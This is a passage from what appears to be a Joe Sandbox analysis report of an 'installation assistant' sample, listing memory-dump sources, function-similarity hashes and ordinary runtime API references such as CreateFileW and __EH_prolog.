                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1535124805.000000006C7F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1535095993.000000006C7F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1536340055.000000006C996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537854303.000000006CB5D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                • String ID:
                                                                                                                • API String ID: 2583163307-0
                                                                                                                • Opcode ID: e2e4d4405e54eefbd70790a5005d9540da71db90d1fe2a88701627413b2cb8d1
                                                                                                                • Instruction ID: 89d61ac8b5a2045b38c2a35eb70be9f03e120fffeca449dc884e83a963e4b303
                                                                                                                • Opcode Fuzzy Hash: e2e4d4405e54eefbd70790a5005d9540da71db90d1fe2a88701627413b2cb8d1
                                                                                                                • Instruction Fuzzy Hash: EF014832B0726017CB01063A9885BAD27BC4B97F3CF2D4A59E929CBEC2DF61C8456291
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1535124805.000000006C7F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1535095993.000000006C7F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1536340055.000000006C996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537854303.000000006CB5D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 8Q
                                                                                                                • API String ID: 0-4022487301
                                                                                                                • Opcode ID: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                                                                                                                • Instruction ID: df3f0ab4abcf05579f29376ac1405b8661196e8b41846a064ff72a93f29acd44
                                                                                                                • Opcode Fuzzy Hash: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                                                                                                                • Instruction Fuzzy Hash: 50F0D132A136105ACB351A3D8800BCA33A89FB233CF240B15E824A3ED0EB34D50A86B1
                                                                                                                APIs
                                                                                                                • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C9748D4
                                                                                                                • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C974914
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1535124805.000000006C7F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1535095993.000000006C7F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1536340055.000000006C996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537854303.000000006CB5D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Ios_base_dtorstd::ios_base::_
                                                                                                                • String ID:
                                                                                                                • API String ID: 323602529-0
                                                                                                                • Opcode ID: bfcbcab9ebe4e4bef355eeb61ae60eaa6620c86df1b06d91f9b499d4d4bf8068
                                                                                                                • Instruction ID: 43236042b46f0b1d655345204229278060576d510bcf58f09071c0beb8c934e1
                                                                                                                • Opcode Fuzzy Hash: bfcbcab9ebe4e4bef355eeb61ae60eaa6620c86df1b06d91f9b499d4d4bf8068
                                                                                                                • Instruction Fuzzy Hash: 26514571101B40DBE335CF25C984BE6BBE4BB04718F448A1CE4AA4BAA1DB34F909CF90
                                                                                                                APIs
                                                                                                                • GetLastError.KERNEL32(6C9A4DD8,0000000C), ref: 6C97DD72
                                                                                                                • ExitThread.KERNEL32 ref: 6C97DD79
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1535124805.000000006C7F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1535095993.000000006C7F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1536340055.000000006C996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537854303.000000006CB5D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorExitLastThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 1611280651-0
                                                                                                                • Opcode ID: 031e38c5782f3c3f7f7dfa11f7618213c7c253a7c00181e3104377d868087169
                                                                                                                • Instruction ID: b5965532f9eef5c97d8a8cab9a1cacdd1ab7841c4bc5b51cc7f4d51201402d4b
                                                                                                                • Opcode Fuzzy Hash: 031e38c5782f3c3f7f7dfa11f7618213c7c253a7c00181e3104377d868087169
                                                                                                                • Instruction Fuzzy Hash: A6F0AFB5A05604AFDB159BB0D408AAE3B74FF61714F244589E006A7B50CB34E906CB60
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1535124805.000000006C7F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1535095993.000000006C7F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1536340055.000000006C996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537854303.000000006CB5D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __wsopen_s
                                                                                                                • String ID:
                                                                                                                • API String ID: 3347428461-0
                                                                                                                • Opcode ID: a9caad2b361d38039e4cf381ce6c3986849b4a2d614addc6a68db996fa945536
                                                                                                                • Instruction ID: d9db8f85f92d989cdb673293058cfd998fbddd99a2556772352eee73fe49ab8f
                                                                                                                • Opcode Fuzzy Hash: a9caad2b361d38039e4cf381ce6c3986849b4a2d614addc6a68db996fa945536
                                                                                                                • Instruction Fuzzy Hash: 85113671A0520AAFCB09CF98E94499F7BF8EF48318F154469F809AB311D670ED21DBA4
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1535124805.000000006C7F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1535095993.000000006C7F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1536340055.000000006C996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537854303.000000006CB5D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _free
                                                                                                                • String ID:
                                                                                                                • API String ID: 269201875-0
                                                                                                                • Opcode ID: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                                                                                                                • Instruction ID: 5e944bcc22e2d232133a5b515083a5305576a52a5c03db00b5db20fb89be7296
                                                                                                                • Opcode Fuzzy Hash: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                                                                                                                • Instruction Fuzzy Hash: C8012C72D01159AFCF01DFE89C04AEE7FB9AB28214F144165E924A2290E731CA659B91
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNEL32(00000000,00000000,?,6C992F35,?,?,00000000,?,6C992F35,00000000,0000000C), ref: 6C993294
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1535124805.000000006C7F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1535095993.000000006C7F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1536340055.000000006C996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537854303.000000006CB5D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 823142352-0
                                                                                                                • Opcode ID: 38d13fe1429614a731c87c9bb381f20caf9bd1e99edd26a65bec5b2af4f38995
                                                                                                                • Instruction ID: e155662e9346f861b93052a8be2634948191c865d0f368f42939fe6bcea1aba7
                                                                                                                • Opcode Fuzzy Hash: 38d13fe1429614a731c87c9bb381f20caf9bd1e99edd26a65bec5b2af4f38995
                                                                                                                • Instruction Fuzzy Hash: 5AD06C3210410DBBDF028E85DC06EDA3BAAFB48714F114000FA1856020C732E861AB90
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1535124805.000000006C7F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1535095993.000000006C7F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1536340055.000000006C996000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537854303.000000006CB5D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                                                                                                                • Instruction ID: 48daf6472ebc404d9fc1c730bdf869231d4329ebb48812d7fe4a4a565ee497d7
                                                                                                                • Opcode Fuzzy Hash: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 6C9C1097
                                                                                                                  • Part of subcall function 6C9C41D6: __EH_prolog.LIBCMT ref: 6C9C41DB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: $ $*$0UJ$@$@
                                                                                                                • API String ID: 3519838083-862571645
                                                                                                                • Opcode ID: e22172b2180ba6d381767f152ec73fcbe70747ea8cb959dd0ada97f8ed321326
                                                                                                                • Instruction ID: 8f2f933d5eaee07b2ebfce0602185cc48482b05f32600555519b264ffa5e3e1a
                                                                                                                • Opcode Fuzzy Hash: e22172b2180ba6d381767f152ec73fcbe70747ea8cb959dd0ada97f8ed321326
                                                                                                                • Instruction Fuzzy Hash: F0336E30E002599FDF15CFA4C894BEDBBB5AF65308F1080A9E4096BA55DB70DE89CF52
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 6CA138A4
                                                                                                                • __aulldiv.LIBCMT ref: 6CA13C4A
                                                                                                                • __aulldiv.LIBCMT ref: 6CA13C78
                                                                                                                • __aulldiv.LIBCMT ref: 6CA13D18
                                                                                                                  • Part of subcall function 6CA1536D: __EH_prolog.LIBCMT ref: 6CA15372
                                                                                                                  • Part of subcall function 6CA1540E: __EH_prolog.LIBCMT ref: 6CA15413
                                                                                                                  • Part of subcall function 6CA14E78: __EH_prolog.LIBCMT ref: 6CA14E7D
                                                                                                                  • Part of subcall function 6CA0F24A: __EH_prolog.LIBCMT ref: 6CA0F24F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$__aulldiv
                                                                                                                • String ID: L$b
                                                                                                                • API String ID: 604474441-3566554212
                                                                                                                • Opcode ID: d9657c234f8b039fc43015c1601217ec1c14bdfa2872b48e6b05b85763b47a84
                                                                                                                • Instruction ID: 5e9d49f1ace3473c5198e41ef451f4971a462f6dd5bb06abc8690b98706a398c
                                                                                                                • Opcode Fuzzy Hash: d9657c234f8b039fc43015c1601217ec1c14bdfa2872b48e6b05b85763b47a84
                                                                                                                • Instruction Fuzzy Hash: 18E28D70D09299DFDF15CFA8CA90ADCBBB5BF15308F148099D449A7B81DB30AE89CB51
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 6CA064B1
                                                                                                                  • Part of subcall function 6CA0793B: __EH_prolog.LIBCMT ref: 6CA07940
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: 1$`)K$h)K
                                                                                                                • API String ID: 3519838083-3935664338
                                                                                                                • Opcode ID: fb81dbfa73f61bd15ec69b15b7f2714c80bc06e5f8e59c27703e0bd61042d5ed
                                                                                                                • Instruction ID: 3128f6f4a828d0671e5898a1109b5cbf12c1b8c3da48baac3e45b0589a7a3665
                                                                                                                • Opcode Fuzzy Hash: fb81dbfa73f61bd15ec69b15b7f2714c80bc06e5f8e59c27703e0bd61042d5ed
                                                                                                                • Instruction Fuzzy Hash: 2BF27D70E00648DFDB11CBA8D888BDDBBB5AF59348F284499E849EB741DB709AC5CF11
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 6C9F8EF4
                                                                                                                  • Part of subcall function 6C9FC622: __EH_prolog.LIBCMT ref: 6C9FC627
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: $h%K
                                                                                                                • API String ID: 3519838083-1737110039
                                                                                                                • Opcode ID: 17cf35b80b03fcff345a605a7a63ea6e65b0b9a8420bc989c8341716572d16e6
                                                                                                                • Instruction ID: 103c6d8f8a4af69d1bd5da1f3328b5fb4f49e867b53abdc5535519c169c8566f
                                                                                                                • Opcode Fuzzy Hash: 17cf35b80b03fcff345a605a7a63ea6e65b0b9a8420bc989c8341716572d16e6
                                                                                                                • Instruction Fuzzy Hash: 0C536830901258DFDB15CFA4C994BEDBBB4AF29308F2440D9D469A7691DB70EE8ACF11
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: $J
                                                                                                                • API String ID: 3519838083-1755042146
                                                                                                                • Opcode ID: bc8a295356575513f6860aba7bf9c3ae3d8e4be31f89be339654daa28ae8d27d
                                                                                                                • Instruction ID: 8aa6512c43f8bd41438ace6694453f4c55f23133234720171b6478c3a4417da8
                                                                                                                • Opcode Fuzzy Hash: bc8a295356575513f6860aba7bf9c3ae3d8e4be31f89be339654daa28ae8d27d
                                                                                                                • Instruction Fuzzy Hash: 63E2CF30A05249DFEF01CFA8E698BDDBBB1AF0534CF284198E855AB681C774DD85CB61
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 6C9D4CE5
                                                                                                                  • Part of subcall function 6C9AAC2A: __EH_prolog.LIBCMT ref: 6C9AAC2F
                                                                                                                  • Part of subcall function 6C9AC6A6: __EH_prolog.LIBCMT ref: 6C9AC6AB
                                                                                                                  • Part of subcall function 6C9D4A0E: __EH_prolog.LIBCMT ref: 6C9D4A13
                                                                                                                  • Part of subcall function 6C9D4837: __EH_prolog.LIBCMT ref: 6C9D483C
                                                                                                                  • Part of subcall function 6C9D8143: __EH_prolog.LIBCMT ref: 6C9D8148
                                                                                                                  • Part of subcall function 6C9D8143: ctype.LIBCPMT ref: 6C9D816C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$ctype
                                                                                                                • String ID:
                                                                                                                • API String ID: 1039218491-3916222277
                                                                                                                • Opcode ID: 905438d877a3164863332086eaa33768b02ac55e5ee0ef1456ae7a8ba4df0a90
                                                                                                                • Instruction ID: fdbb81d0f738d1d4b11f85a27ce0f154c54a755b93d9ec53157d6e756f8c26dc
                                                                                                                • Opcode Fuzzy Hash: 905438d877a3164863332086eaa33768b02ac55e5ee0ef1456ae7a8ba4df0a90
                                                                                                                • Instruction Fuzzy Hash: 7A038C30805689DEDF15CFA4C940BDCBBB4AF35308F25809AE44577A91DB34EB8ADB61
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 3J$`/J$`1J$p0J
                                                                                                                • API String ID: 0-2826663437
                                                                                                                • Opcode ID: 0ce0cf568756059b319bec402cc4c845d2048d3ed56d6c8deb0de92fa915ba20
                                                                                                                • Instruction ID: 0c155f6c437a91db25183a96c20239582381a19f1271f4def74791d204133403
                                                                                                                • Opcode Fuzzy Hash: 0ce0cf568756059b319bec402cc4c845d2048d3ed56d6c8deb0de92fa915ba20
                                                                                                                • Instruction Fuzzy Hash: 3541F772F10A200AB3488F3A8C855667BC3C7CA346B4AC23DD5A5CB6D9DA7DC44782A4
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: W
                                                                                                                • API String ID: 3519838083-655174618
                                                                                                                • Opcode ID: ea00faa881669fc0c82860575f49db2074e6a46241474c433f0857494c018303
                                                                                                                • Instruction ID: c4321883003be9874a188d7439a34b5b5756950687c249c400edc7202a57a9f7
                                                                                                                • Opcode Fuzzy Hash: ea00faa881669fc0c82860575f49db2074e6a46241474c433f0857494c018303
                                                                                                                • Instruction Fuzzy Hash: 61B27B74A05259DFDB01CFA8C888B9DBBF8AF49308F244099E865EB751C775DD42CBA0
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID:
                                                                                                                • API String ID: 3519838083-3916222277
                                                                                                                • Opcode ID: 6283ffce90d7722d82f06bf6062908a4dbdb23c6aa848be1631664cf1bbb550b
                                                                                                                • Instruction ID: f9b5810b1494482a5c354ac5f5e9ee01c64ae12b9632ceb29b560d8c84f55cae
                                                                                                                • Opcode Fuzzy Hash: 6283ffce90d7722d82f06bf6062908a4dbdb23c6aa848be1631664cf1bbb550b
                                                                                                                • Instruction Fuzzy Hash: 4292B131905249DFDB06CFA8C944BEEBBB5BF69308F244098E815AB791CB71DE45CB90
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID:
                                                                                                                • API String ID: 3519838083-3916222277
                                                                                                                • Opcode ID: bf6cc7e3d5e08887c52fb4d73b2e2a9274b9cdfd61b6f8eb1b64b386a2eecc6f
                                                                                                                • Instruction ID: 1acb7dac005784eb6af139ba2bacacd52a594a6b1b10de676bc80f7453f6e8e4
                                                                                                                • Opcode Fuzzy Hash: bf6cc7e3d5e08887c52fb4d73b2e2a9274b9cdfd61b6f8eb1b64b386a2eecc6f
                                                                                                                • Instruction Fuzzy Hash: DF225770A002499FDB14CFA8D494BAEBBF0FF18308F148559E8599B782D775E989CF90
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 6C9F289B
                                                                                                                  • Part of subcall function 6C9F3FC9: __EH_prolog.LIBCMT ref: 6C9F3FCE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C9A6000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: @ K
                                                                                                                • API String ID: 3519838083-4216449128
                                                                                                                • Opcode ID: 2aafbb27e948f5792f5f0ae65a5e3f4f4742fa89f16e976c1927d8ca4eeab830
                                                                                                                • Instruction ID: f2b2d59627947d4ddff2dbb4d140caef0227b4b3c1a831e402b9677c36985d11
